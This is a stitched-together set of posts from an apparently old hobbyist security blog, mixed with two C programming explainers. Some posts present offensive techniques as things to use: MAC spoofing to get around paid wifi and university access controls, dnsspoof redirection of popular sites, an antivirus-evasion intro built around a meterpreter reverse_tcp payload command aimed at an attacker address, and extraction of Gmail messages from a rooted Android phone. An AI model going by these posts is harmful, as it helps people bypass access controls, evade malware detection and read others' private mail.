In the noon time i was chatting with one of my friend while he was at an airport in Paris, during the chat he mentioned that he paid some bucks to access wifi for half an hour.
Well that lead to a spark in my brain. On some basic quick thinking it reminded me about the same situation that i faced while travelling too,
but in my scenario, i only faced two types of policies used by admins at airport that restricted wifi access.
1-- MAC ADDRESS CROSS CHECK.
2-- SUPPLYING USER WITH A TEMP KEY THAT EXPIRES IN A TIME PRE-DEFINED TIME PERIOD.
On collecting info from him it showed that they are surely using the first case.
That just reminded me of something similar i went through while helping a friend in china,
basically there university was using a a client software, that assigns ip address by checking mac add.
so access to other systems except the university registered laptop/pc was
restricted, so we used the similar trick for of spoofing the mac address
n voila it worked.
so just for explaining that part created to vidz of tools n there how tos for spoofing it on both win and a Linux system.
tools used are :: win : macshift : link
Linux : macchanger :: link
## on any debian based distro like ubuntu just
## apt-get install macchanger
##if you guys using backtrack or any other security distro i should probably be there in it.
So here are the videos to get you start up fast and easy.
mac address spoofing Linux
mac address spoofing Windows
Thanks for reading.
For any queries or suggestions plz comment below.
Yinsain.
Hey guys this is yash aka yinsain here,if you are reading this then you are surely not infected with it. I was getting a bit curious about all this news i was getting from my friend about a new malware hitting the web, well as i looked into it, it looks nothing new, just the old skool technique to redirect victims to a malicious server for there own good.
Methods are still the same but the techniques to achieve that has really evolved from years till now. As this name is a bit eye catchy you might be interested but do you really know what it is and what will it do.
Lets start with the name, Monday malware was given to it because it will knock you off the internet on monday that is today 9/7/2012 as most of the agencies are saying.
Well its actual name is still not defined but people have given its so many names, and some are from gov agencies also to classify it.
Other name is 'Alureon/DNS Changer bot'.
So lets dig into its working, as i dont hold a working executable or its source code. So i will be demonstrating the effect of this malware in a controlled enviroment via some network tools.
To understand the basic working of this malware you should be aware of some of the working principles of internet. The one we are focusing on in this blog post is DNS. For a basic explanation, this is the service which manages the juggling of ip addresses and the host names, wrong info of ipaddress will lead you to a wrong page, that is what that malware do but in a stealthy manner, most probably redirecting the victim to thr own server for malicious purposes. for further details you can read this.
Here i am using a virtual machine to depict a victim and using a linux(ubuntu) host machine to create an infected scenario.
Tools :: dsniff-suite, Virtualbox.
Setup ::
Getting the softwares,
------------------------------------------------------------------------------------------------------------------------------------
apt-get install dsniff
for virtualbox
either download a installer file for your o.s. or follow the linux way.
please note you will require root priviledges to do this.
-------------------------------------------------------------------------------------------------------------------------------------
And now for the dnsspoof, this tool reads out the domains from a file which we can provide.
edit it the way you feel, just maintain the structure it recognizes.
here is mine.
so we are ready..
i have just added three entries for the common sites that people open.
>> paypal
>> facebook
>> google
So the setup for the tool is ready,
Now you need a victim, here in our example we are using a virtual victim
so you can google it to get a detailed instruction to get a virtual machine all set with o.s. of your choice for this.
Our victim here is windows xp user.
NOTE :: THIS DEMO WORKS ON ALL THE O.Ss INCLUDING WINDOWS, MAC OS AND LINUX. BUT THE REAL MALWARE WAS REPORTED TO JUST WORK ON WINDOWS AND MAC OS TILL NOW. LINUX STILL SURVIVES HUH.
So lest fire up our virtual machine.
lets open up our websites....
as you can see, all the three seems to opening fine..
and even the dns_cache is fine.
So lets start the attack to create an infected scenario....
I will try to keep it least complicated so open up three different instances of terminal.
As you can see the url was valid, but due to the infected victim machine,
request got redirected to the host mentioned in the spoof file for dnsspoof.
Be careful while logging in any of your accounts or buying any stuff online, if you are infected you may endup in a bad situation.
This is how a dns spoofing can occur, this is extremely dangerous for day to day users, as they may get redirected to fake pages and innocently give up their login credentials without any suspicion.
PREVENTIVE MEASURES::
>> do get your system cleaned by a valid tool like avira dnschanger bot remover if your windows or mac is infected.
>> contact your isp to get a valid list of dns servers' ipaddresses which are owned by the isps.
Again thanks for reading.
plz leave comments or message me for any query.
If you are familiar with this term then you are surely a good programmers,
it is often slammed upon us to use it in our programs.
Why is it so important, well uses of this so called preprocessor are infinite.
from basic macro substitution to, case based selection,
and even some combined with ternary operators ( ? : ).
At this point everything moves well for every most of us,
but then its a pain in the place we hate the most as soon as we meet these type of declarations.
If have seen some really good programmers fall for this type of confusion.
For many of people, its like how the f@#$ another pound symbol got in thr,
this goes for guys learning programming online because 70-80% sites teaching C language are not covering up this minute detail.
Documentation for this type of usage can be acknowledged
from the very famous "THE C PROGRAMMING LANGUAGE" by Kernighan and Ritchie.
As taken from their book
"formal parameters are not replaced within quoted strings. If, however, a parameter name is preceded by a # in the replacement text, the combination will be expanded into a quoted string with the parameter replace by the actual argument"
So
------------------------------------------------------------------------------------------------------------------------------------
//when invoked by num = 2
macro gets expanded into
printf("2" " = %d\n" , 2);
As we know the nature of "" " in C it obviously gets concatenated.
One pound symbol was enough to create enough confusion, but now here we have two of them, but dont get fooled by the look, its rather easy to understand than the previous one.
Parameters passed through gets concatenated with each other.
## cause all white spaces to be removed surrounding it and if there lies a parameter adjacent to it, it replaces it with the actual parameter values.
THIS
INFORMATION IS FOR EDUCATIONAL PURPOSES ONLY. I WILL NOT BE HELD
LIABLE
FOR
WHAT YOU DO WITH THIS INFORMATION.
NOT FOR BEGINNERS,
PRIOR KNOWLEDGE OF C/C++ LANGUAGE IS NECESSARY, AND FUNCTIONING OF METASPLOIT FRAMEWORK.
//ALSO,
THIS TECHNIQUE WAS FOUND BY ME ON 8/6/12. SO WORKING OF THIS WILL
LAST TILL THE DATE NO UPDATE PATCH IS RELEASED FROM AV COMPANIES.
Most
of you guys are familiar with metasploit framework, which is really
popular for its day by day increasing inventory of exploits and
tools, but on the same hands anti-virus companies are also trying to
stay
in pace with this opensource project.
Everything
comprising of metasploits arsenal is now heavily tagged by all avs
and they get instantly detected. Inspite of this people are using it
and still get their job done.
Questions
is how??
When
i started out on this topic, there were numerous videos and articles
of bypassing antiviruses on youtube and forums.
But
as you go down the articles and reach comment, there you will usualy
find
“ sorry
dude doesnt work anymore antiviruses tagging this also”.
Not
thr fault, companies are keeping up good.
But
still some guys out thr in the wild are still running ahead of them.
If
you were in similar situation like mine, you must have also tried out
every possible combination of encoders , and also various crypters
available online.
And
some lazzy chaps or maybe security professionals also who can afford
services paid for crypting softwares in the market.
But
now even that is not a problem companies are providing these service
even more cheaper prices then you can imagine, just to cut down ther
competition.
Now
lets start with the inbuilt tools,
msfpayload
--> simply generating an exe from this file was never a good
choice.
msfpayload
| msfencode --> this is what many peope have tried
The
technique that i found is result of weird thoughts while having left
over snacks late night.
Happy
i had that.
Most
of you who have used msfpayload are pretty familiar with the usage of
it and how it can be used to generate shellcode.
And
also raw stream to pipe it in other tools like msfencode.
On
simply creating a shell code with msfpayload
$
/msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.14
lport=4474 C
In this post i will be guiding you through an easy method of setting up your exploitation framework and this tool is nothing else than the superior metasploit framework..
GUYS THIS TUTORIAL IS FOR LINUX OS, IF YOU WANT THE SAME FOR WINDOWS COMMENT, MESSAGE ME.
So lets start out,
tools required :: a linux os
its upto you which one you prefer, im using arch linux but you can use ubuntu. Its a newbie-friendly distro as compared to arch.
www.ubunut.com
Assuming that your os in installed, doesnt matter on disk or virtually and updated (if not do it, and if you dont kno how, check below).
This whole framework is dependent on ruby language,
so first of all we require to resolve the required dependencies.
------------------------------------------------------------------------------------------------------------------------------
apt-get update && apt-get upgrade
//this will do the update part
this will install the necessay packages
-------------------------------------------------------------------------------------------------------------------------------
Now the method we will using to fetch metasploit for our system is using subversion.
to kno more about it.
http://subversion.apache.org/
Now the minor things are done now comes the important part
Subversion is a version control system, basically what it does is it synchorises your local folder with the remote folder being used as a developement base
svn >> acronym for subversion this is used for commands
-----------------------------------------------------------------------------------------------------------------------------------
something like this should be visible, it will list down the remote folders and files
If you get something similar that means you are ready to go.
now, do
------------------------------------------------------------------------------------------------------------------------------------
$ svn checkout https://www.metasploit.com/svn/framework3/trunk/ msf
or
$ svn co https://www.metasploit.com/svn/framework3/trunk/ msf
both are same, co is for checkout same as svn for the whole
--------------------------------------------------------------------------------------------------------------------------------------
This will create a folder named msf with all the files in your current directory.
This a big download and takes few seconds to initiate so wait for it,
soon it will start and your screen will be filled with data transfer details
So now you are back with all the downloaded files.
if you now issue ls command you will surely
see all the files
This is it this your framework succesfully installed.
UPDATE
Now to update it this command can be used, for that you have to come to this directory everytime, as subversion checks the current directory to recognize the point of last update
------------------------------------------------------------------------------------------------------------------------------------
$ svn update
------------------------------------------------------------------------------------------------------------------------------------
//As you have just installed it you wont be requiring any update but i would recommend you keep updating it in a day or two for latest exploits, me myself usually do it everyday, you can automate this also with crontab.
After each update there is a revision no. left to keep track like this
Now you can test your main tool, in this all of these msf* tools are extremely useful and if used in a combined manner can render a desired exploitation.
issue this command
------------------------------------------------------------------------------------------------------------------------------------
$ ./msfconsole
------------------------------------------------------------------------------------------------------------------------------------
if it loads up without any errors with ruby interpreter then you are good to go and it should look like this, and you will be welcomed with a msf> prompt
EXTENSIONS
Now comes the part for installing extensions, not a priority but it is required to enable raw sockets and wifi modules.
Raw sockets,
go to your dir where you installed msf and then into external and then
----------------------------------------------------------------------------------------------------------------------------------
$ cd /opt/metasploit3/msf3/external/pcaprub/
# cd /opt/metasploit3/msf3/external/ruby-lorcon2/
# svn co http://802.11ninja.net/svn/lorcon/trunk lorcon2
# cd lorcon2
# ./configure --prefix=/usr && make && make install
# cd ..
# ruby extconf.rb
# make && make install
Hi guys this is yash aka yinsain again with a duly awaited post.
THIS IS FOR EDUCATIONAL PURPOSES, I STAND NO INVOLVEMENT IN WHAT YOU DO WITH THE INFORMATION PROVIDED.
Nowdays most of the people around us are in favour of using an android device in the name of a smartphone well after all its a smart choice too.
First thing that people think of while using a smart phone is staying online and updated.
But how safe is it, people are scribbling down their credentials on this tiny device to stay in contact but till date nothing has changed, every app or even a system requires a lookup file to authenticate whether the true user is thr or not.
passwords still are the strongest and the weakest security link in whole infosec thing.
Whenever even a kid even hears about hacking first thing that comes to his/her heart is password of an email-id, well here i will show you how to get in one without using a password.
So we will focus our this post on the same and then we will blend into other security aspects of what can be risky and what cant.
Two possible scenarios are there
--> either you have a brand new phone or a phone that you use as a casual guy nothing hardcore or test-head and by mistake you install a malicious apk that roots your phone for gainig priviledges, this is how most of these things are working.
the infamous GINGERBREAK exploit that created a chaos because of it being used in other malicious apk.
--> or you might be having a rooted phone like me, that you rooted down for your experiments,,
but how aware are you, of all possible dangerous factors.
So lets start with a rooted phone because in both of the cases above end point is this only.
I will be using my real phone only, no emulator to show this, so in this post,
my details will be visible.
Lets plug this phone in debugging mode and spawn the shell.
layout is pretty standard.
now lets move towards the attractive folder data and again in data inside the previous one.
now issue ls command it will show you a long list of installed apk's data folders.
now we can easily navigate to our folder of our desired app.
Our grapes reside inside the com.google.android.gm folder so go into that and then into databases again issue ls command.
As you can see my email id is thr in a folder name.
but the useful db file is downloads.db for android 2.1 and for my specific cyanogemod7rc2 its mailstore.ydeep18@gmail.com.db, we will copy that out to sdcard for further inspection.
cp mailstore.ydeep18@gmail.com.db /sdcard
as this phone is rooted so acces denied problem will be there just like it wont cause a problem for any attacker who has gained root shell on your device.
now we have our db file, now how to open it, well i did this while is was in kota in a hostel so i had no pc around me for an year, so i downloaded an app on my phone only to perform this.
APP :: aSQLiteManager
Lets start first with the phone
so open up your aSQLiteManager
open db file, the mailstore one.
select whichever you wanna view, but i kno the juicy one is messages. so lets open that
and with all your guts click on data to kno thr truth....
and there it is all your synchronised email, now say who needs a password.
and continously scrolling sideways
'
As you can see, how lethal this can be.
PREVENTIONS
:: please check permissions needed by your application before installing
:: never leave your unattented. This works 90% of the time.
I will soon post other stuff for android forensics
Guys im again informing you this is not a tutorial for development, only things covered in this post will be about setting up your android tools.
Further posts may even dig deeper in android forensics.
So for even starting up with your setup you should first decide about your platform. I would recommend mac or a linux box, and this tutorial is also following the same. But windows guys dont feel bad, comment below and i will respond with solutions and help.
So guys if you are familiar with Linux then its a plus point, if you dont then also its not a major issue, you can catch up any time you want. Download any iso of a Linux distribution of your preference. I would recommend Ubuntu, its a bit rookie friendly.
heres the link download
These distros are available in livecd format but you will require a system with installation done because you want your changes to be persistent.
Daring new guys can surely install it on a system, but if you are scared of blowing of your close-to-your-heart windows installation then virtualization solutions are always present.
You can try out virtual-box or vmware-player both are excellent.
I wont be guiding for with a linux installation, so google it.
So, lets assume now you have a working linux distribution on a disk or virtually, or maybe you are on the classier side and giving a smirk with a mac.
But mac guys take care and check out the documentation because im not helping.
linux guys now fire up your terminal.
If you are on an older version of ubuntu say before 11.04, then you probably on gnome2 enviroment so go to applications under accesories or system tools there will be terminal, on a newer distro, guys just hit your windows key and type in terminal it will be there.
so you have your terminal opened up.
now lets resolve the dependencies required to run our sdk.
As we are working on linux so fetch the required tar file and place it in a
folder of your choice.
Usually additional installation are done under /opt directory but you can feel free to put it anywhere, for the rest of the post i wil be keeping it in /opt.
gain the required priviledges for that folder and continue to extract it.
for newbies please just right click and follow it.
for guys who are comfortable and wanna learn do this
----------------------------------------------------------------------------------------------------------------
reach your directory and
do
tar zxvf android-sdk_r18-linux.tgz
the no. after r may vary for you depending on when are you viewing this
-----------------------------------------------------------------------------------------------------------------
now cd into the directory issue ls command
now some of the sub-directories are visible.
first and the most important utility require is adb, but unfortunately, it has been shifted to platforms folder that means we have to download it.
For that go into tools directory and enter ./android.
Another screen will pop up showing a gui like this select Android platform tools and then click on install package.
let it download the required package.
After its done, go back to upper directory and then into platform-tools and issue ls command.
So here we are, our two of the most important tools that we require are here.
adb and fastboot.
Now you can issue command ./adb devices but no devices will be shown if not
connected in debugging mode,
here is how you can put your android in debugging mode go to settings/application/development and then select Android debugging.
so now your device is ready,
now try again, it should show it now.,
now you can issue ./adb shell command too, as tis the only device connected it will drop down its shell only,
now its upto you how you explore into.
and we have the android shell..
Plz do follow the post nxt post regarding android will go into forensics of its filesystem.
If you are a beginner programmer in C, then you must have created almost every program with a printf() function, what is so important about it that we use it in most of our programs?
It provides us with visual details of what a program is outputting. It basically writes out its result onto the stdout.
But if you go through the lines submitted by the creators themselves i.e. Brian W. Kernighan and Dennis M. Ritchie, you will be shocked for a bit, but it is the truth,
"by the way, printf is not a part of the C language; there is no imput or ouput defined in C itself. printf is just a useful function from the standard library of functions that are normally accessible to C programs."
This thin, yet powerful language which is said to be portable infact is as portable as its libraries. Its libraries are its extensions which creates functionality.
There are just so many libraries available in the wild supporting all types of architectures and instrcution sets that it may appear c language is highly portable.
As this language is a major constituent for the famous unix os and the gnu/linux kernel, you can judge how powerful its functioning is. But still most of the work is done under the hood, no output to a console is made to every little syscall or connection.
This can be very easily explained by a simple example of kernel programming.
here
as you can see in this, no use of printf can be seen but instead printk is used.
make file for the same is here
issue the make command to generate the neccesary executables.
so as you can see, a kernel module has been compiled.
now lets insert our module into the kernel with insmod command. {issue sudo command if required for privilidges}
so now even the module has been inserted succesfully, a weird questions arises, where is the output for printk()
here it is, the last line, this log can be viewed by dmesg command same thing happens when we remove our module from the kernel by issuing rmmod command, then it prints out the line in cleanup_module(),
Still for many of you there is a question that haunts you, where did the output go and why it never came up on any console screen.
in this eg, procedure of module loading and unloading is shown, this takes place several time during your reboots and shutdowns, but for most of them no output is shown, just a mere on-success statement is passed.
printf is also similar, its just for our better presentation and debugging help, in real programming it never plays any major role. This whole kernel loading thing was managed by kernel and all the outputs were logged in syslogd/klogd. So these daemons are high end designs/programs created in c, yet they dont use printf().
I hope this was of help for you. Thanks for reading. B-)
